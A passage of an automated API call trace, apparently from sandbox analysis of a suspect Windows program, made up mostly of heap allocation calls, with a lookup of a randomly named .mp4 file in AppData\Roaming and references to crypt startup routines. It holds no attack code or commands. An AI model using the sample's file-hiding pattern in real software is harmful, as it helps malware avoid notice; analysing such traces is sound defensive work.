0x2e79338 [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0238.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0238.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0238.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0238.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0238.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0238.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0238.283] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0238.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0238.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0238.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0238.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0238.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0238.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0238.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0238.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0238.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50668 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0238.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f850 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f968 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0238.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9e0 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0238.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f940 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa80 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0238.284] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8a0 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0238.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0238.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0238.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0238.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8c8 | out: hHeap=0x970000) returned 1 [0238.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0238.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0238.285] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0238.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa30 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0238.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0238.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0238.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0238.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0238.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0238.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0238.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0238.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0238.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0238.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0238.286] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0238.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa58 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faf8 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0238.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa08 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0238.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa58 | out: hHeap=0x970000) returned 1 [0238.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0238.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0238.287] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0238.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f990 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0238.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fad0 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0238.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0238.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0238.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0238.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0238.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0238.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0238.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.288] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/R2j101Rhh.mp4", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e6e240, ftCreationTime.dwHighDateTime=0x1d5ef13, ftLastAccessTime.dwLowDateTime=0xf39202f0, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0xf39202f0, ftLastWriteTime.dwHighDateTime=0x1d5e2b8, nFileSizeHigh=0x0, nFileSizeLow=0x3eb0, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="R2j101Rhh.mp4", cAlternateFileName="R2J101~1.MP4")) returned 0xa876d0 [0238.288] FindClose (in: hFindFile=0xa876d0 | out: hFindFile=0xa876d0) returned 1 [0238.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0238.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0238.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0238.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0238.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0238.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0238.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f918 | out: hHeap=0x970000) returned 1 [0238.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0238.289] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa58 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0238.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0238.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0238.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0238.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0238.289] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0238.289] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0238.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0238.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0238.289] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0238.290] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0238.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0238.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0238.290] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0238.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0238.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0238.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0238.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0238.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0238.290] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0238.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0238.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0238.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0238.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0238.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0238.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0238.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 